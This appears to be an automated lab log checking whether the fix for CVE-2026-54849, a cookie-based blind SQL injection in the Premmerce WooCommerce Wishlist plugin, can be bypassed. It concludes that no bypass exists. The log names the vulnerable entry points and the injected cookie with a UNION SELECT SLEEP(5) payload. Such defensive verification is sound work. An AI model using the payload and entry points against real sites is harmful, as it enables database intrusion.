========================================================== CVE-2026-54849 - VARIANT / BYPASS ANALYSIS ROOT=/data/pruva/runs/d6a2ae4c-d5a4-4728-a923-2686f819f867/bundle date: 2026-07-05T13:43:40Z ========================================================== [i] artifact ok: /data/pruva/runs/d6a2ae4c-d5a4-4728-a923-2686f819f867/bundle/artifacts/premmerce-1.1.11.zip (930475 bytes) [i] artifact ok: /data/pruva/runs/d6a2ae4c-d5a4-4728-a923-2686f819f867/bundle/artifacts/premmerce-1.1.12.zip (927132 bytes) [i] artifact ok: /data/pruva/runs/d6a2ae4c-d5a4-4728-a923-2686f819f867/bundle/artifacts/premmerce-1.1.13.zip (1104745 bytes) [i] artifact ok: /data/pruva/runs/d6a2ae4c-d5a4-4728-a923-2686f819f867/bundle/artifacts/woocommerce.8.9.3.zip (21029990 bytes) [i] pulling docker images (cached if present) [i] tearing down any previous stack [i] starting MariaDB [i] starting WordPress (wordpress:6.7.2-php8.2-apache) [i] waiting for MariaDB to accept connections [i] MariaDB ready after 9s [i] waiting for WordPress apache to respond [i] WordPress apache up (http=302) after 1s [i] installing wp-cli inside WordPress container [i] running WordPress core install (admin=sqliadmin, url=http://premmerce-wp) Success: WordPress installed successfully. [i] installing + activating WooCommerce 8.9.3 (from cached zip) Activating 'woocommerce'... Plugin 'woocommerce' activated. Success: Installed 1 of 1 plugins. [i] enabling pretty permalinks Success: Rewrite rules flushed. Success: Rewrite rules flushed. [i] installing Premmerce Wishlist 1.1.11 (VULNERABLE) Success: Plugin already deleted. Plugin 'premmerce-woocommerce-wishlist' activated. Success: Installed 1 of 1 plugins. name version premmerce-woocommerce-wishlist 1.1.11 woocommerce 8.9.3 [*] VULNERABLE 1.1.11 candidate sweep [i] wishlist page id: 11 [vuln-C0-baseline-add/popup-GET] -> http=200 time=5.196680s (body: /data/pruva/runs/d6a2ae4c-d5a4-4728-a923-2686f819f867/bundle/vuln_variant/artifacts/c0_vuln.body) [vuln-C1-wc-ajax-popup-GET] -> http=200 time=6.053645s (body: /data/pruva/runs/d6a2ae4c-d5a4-4728-a923-2686f819f867/bundle/vuln_variant/artifacts/c1_vuln.body) [vuln-C2-rest-add-POST] -> http=200 time=5.156079s (body: /data/pruva/runs/d6a2ae4c-d5a4-4728-a923-2686f819f867/bundle/vuln_variant/artifacts/c2_vuln.body) [vuln-C3-page-render-GET] -> http=200 time=5.138215s (body: /data/pruva/runs/d6a2ae4c-d5a4-4728-a923-2686f819f867/bundle/vuln_variant/artifacts/c3_vuln.body) vuln times (c0 c1 c2 c3): vuln 5.196680 6.053645 5.156079 5.138215 [i] installing Premmerce Wishlist 1.1.12 (FIXED) Plugin 'premmerce-woocommerce-wishlist' deactivated. Success: Deactivated 1 of 1 plugins. Deleted 'premmerce-woocommerce-wishlist' plugin. Success: Deleted 1 of 1 plugins. Plugin 'premmerce-woocommerce-wishlist' activated. Success: Installed 1 of 1 plugins. name version premmerce-woocommerce-wishlist 1.1.12 woocommerce 8.9.3 [*] FIXED 1.1.12 candidate sweep [i] wishlist page id: 12 [fixed-C0-baseline-add/popup-GET] -> http=200 time=0.107576s (body: /data/pruva/runs/d6a2ae4c-d5a4-4728-a923-2686f819f867/bundle/vuln_variant/artifacts/c0_fixed.body) [fixed-C1-wc-ajax-popup-GET] -> http=200 time=0.042549s (body: /data/pruva/runs/d6a2ae4c-d5a4-4728-a923-2686f819f867/bundle/vuln_variant/artifacts/c1_fixed.body) [fixed-C2-rest-add-POST] -> http=200 time=0.074162s (body: /data/pruva/runs/d6a2ae4c-d5a4-4728-a923-2686f819f867/bundle/vuln_variant/artifacts/c2_fixed.body) [fixed-C3-page-render-GET] -> http=200 time=0.103984s (body: /data/pruva/runs/d6a2ae4c-d5a4-4728-a923-2686f819f867/bundle/vuln_variant/artifacts/c3_fixed.body) fixed times (c0 c1 c2 c3): fixed 0.107576 0.042549 0.074162 0.103984 [i] installing Premmerce Wishlist 1.1.13 (LATEST) Plugin 'premmerce-woocommerce-wishlist' deactivated. Success: Deactivated 1 of 1 plugins. Deleted 'premmerce-woocommerce-wishlist' plugin. Success: Deleted 1 of 1 plugins. Plugin 'premmerce-woocommerce-wishlist' activated. Success: Installed 1 of 1 plugins. name version premmerce-woocommerce-wishlist 1.1.13 woocommerce 8.9.3 [*] LATEST 1.1.13 candidate sweep [i] wishlist page id: 13 [latest-C0-baseline-add/popup-GET] -> http=200 time=0.120578s (body: /data/pruva/runs/d6a2ae4c-d5a4-4728-a923-2686f819f867/bundle/vuln_variant/artifacts/c0_latest.body) [latest-C1-wc-ajax-popup-GET] -> http=200 time=0.040770s (body: /data/pruva/runs/d6a2ae4c-d5a4-4728-a923-2686f819f867/bundle/vuln_variant/artifacts/c1_latest.body) [latest-C2-rest-add-POST] -> http=200 time=0.075403s (body: /data/pruva/runs/d6a2ae4c-d5a4-4728-a923-2686f819f867/bundle/vuln_variant/artifacts/c2_latest.body) [latest-C3-page-render-GET] -> http=200 time=0.099767s (body: /data/pruva/runs/d6a2ae4c-d5a4-4728-a923-2686f819f867/bundle/vuln_variant/artifacts/c3_latest.body) latest times (c0 c1 c2 c3): latest 0.120578 0.040770 0.075403 0.099767 ========================================================== RESULTS (seconds: c0_baseline c1_wcajax c2_restadd c3_page) vulnerable 1.1.11: 5.196680 6.053645 5.156079 5.138215 fixed 1.1.12: 0.107576 0.042549 0.074162 0.103984 latest 1.1.13: 0.120578 0.040770 0.075403 0.099767 ========================================================== sleeps(>=4s) on vulnerable: 4/4 sleeps(>=4s) on fixed 1.1.12: 0/4 sleeps(>=4s) on latest 1.1.13: 0/4 vuln_baseline_c0_sleeps=true BYPASS_on_fixed_or_latest=false [i] wrote /data/pruva/runs/d6a2ae4c-d5a4-4728-a923-2686f819f867/bundle/vuln_variant/runtime_manifest.json [i] wrote /data/pruva/runs/d6a2ae4c-d5a4-4728-a923-2686f819f867/bundle/vuln_variant/validation_verdict.json [i] runtime_manifest.json: { "entrypoint_kind": "api_remote", "entrypoint_detail": "Unauthenticated HTTP requests (separate Docker-network client container -> WordPress service by container name) carrying the crafted premmerce_wishlist SLEEP cookie to four candidate entry points: REST /add/popup GET, wc-ajax premmerce_wishlist_popup GET, REST /add POST, and the frontend wishlist page GET.", "service_started": true, "healthcheck_passed": true, "target_path_reached": true, "runtime_stack": [ "mariadb:11.4", "wordpress:6.7.2-php8.2-apache", "woocommerce 8.9.3", "premmerce-woocommerce-wishlist 1.1.11/1.1.12/1.1.13" ], "proof_artifacts": [ "vuln_variant/artifacts/c0_fixed.body", "vuln_variant/artifacts/c0_latest.body", "vuln_variant/artifacts/c0_vuln.body", "vuln_variant/artifacts/c1_fixed.body", "vuln_variant/artifacts/c1_latest.body", "vuln_variant/artifacts/c1_vuln.body", "vuln_variant/artifacts/c2_fixed.body", "vuln_variant/artifacts/c2_latest.body", "vuln_variant/artifacts/c2_vuln.body", "vuln_variant/artifacts/c3_fixed.body", "vuln_variant/artifacts/c3_latest.body", "vuln_variant/artifacts/c3_vuln.body" ], "oracle": "time-based blind SLEEP(5) in the cookie-derived IN (...) SQL; sleep >= 4.0s => injection fired; < 3.0s => no injection.", "candidate_labels": [ "c0_baseline_add_popup_GET", "c1_wc_ajax_popup_GET", "c2_rest_add_POST", "c3_page_render_GET" ], "vulnerable_1111_sleep_seconds": [ 5.19668, 6.053645, 5.156079, 5.138215 ], "fixed_1112_sleep_seconds": [ 0.107576, 0.042549, 0.074162, 0.103984 ], "latest_1113_sleep_seconds": [ 0.120578, 0.04077, 0.075403, 0.099767 ], "vulnerable_sleep_count": 4, "fixed_sleep_count": 0, "latest_sleep_count": 0, "vulnerable_baseline_c0_sleeps": true, "bypass_on_fixed_or_latest": false, "confirmation_status": "no_bypass", "notes": "All four candidate entry points fire SLEEP on vulnerable 1.1.11 (real alternate triggers of the same cookie->concatenation root cause). None fire SLEEP on fixed 1.1.12 or latest 1.1.13. The 1.1.12 fix is defense-in-depth: cookieGet() validates keys with ^[a-zA-Z0-9]{1,13}$ AND every WishlistModel sink is parameterized with $wpdb->prepare(). 1.1.12 and 1.1.13 are byte-identical in security-relevant code. No bypass found." } [i] validation_verdict.json: { "variant_outcome": "no_bypass", "claim_block_reason": "fix_covers_all_alternate_entry_points", "validated_surface": "api_remote", "evidence_scope": "production_path", "claimed_impact_class": "sql_injection", "observed_impact_class": "no_bypass_time_based_sqli_on_fixed", "exploitability_confidence": "high", "attacker_controlled_input": "premmerce_wishlist cookie (JSON array of wishlist keys) with embedded x\") UNION SELECT SLEEP(5),... payload, sent to four distinct unauthenticated entry points", "trigger_path": "cookie -> WishlistStorage::cookieGet() -> WishlistModel::getWishlistsByKeys()/getDefaultWishlistByKeys() (concatenation sink on vuln; parameterized + regex-filtered on fixed)", "end_to_end_target_reached": true, "sanitizer_used": false, "crash_observed": false, "read_write_primitive_observed": false, "exploit_chain_demonstrated": false, "blocking_mitigation": "1.1.12 cookieGet() regex ^[a-zA-Z0-9]{1,13}$ on every cookie key + full $wpdb->prepare() parameterization of all WishlistModel sinks (getWishlistsByKeys, getDefaultWishlistByKeys, setUserToWishlistsByKeys, deleteWishlists, getWishlistsByProductId, getWishlists where_in allow-list). Covers REST /add/popup, wc-ajax popup, REST /add POST, frontend wishlist page, and the wp_login assignUserWishlistFromCookie UPDATE path.", "inferred": false, "candidate_results": { "vulnerable_1111_sleep_seconds": { "c0_baseline_add_popup_GET": 5.19668, "c1_wc_ajax_popup_GET": 6.053645, "c2_rest_add_POST": 5.156079, "c3_page_render_GET": 5.138215 }, "fixed_1112_sleep_seconds": { "c0_baseline_add_popup_GET": 0.107576, "c1_wc_ajax_popup_GET": 0.042549, "c2_rest_add_POST": 0.074162, "c3_page_render_GET": 0.103984 }, "latest_1113_sleep_seconds": { "c0_baseline_add_popup_GET": 0.120578, "c1_wc_ajax_popup_GET": 0.04077, "c2_rest_add_POST": 0.075403, "c3_page_render_GET": 0.099767 } }, "vulnerable_baseline_c0_sleeps": true, "bypass_on_fixed_or_latest": false } [!] NO BYPASS: all alternate entry points are covered by the 1.1.12/1.1.13 fix. (Candidates did fire on vulnerable 1.1.11, confirming they are real alternate triggers of the same root cause, but the fix closes them all.)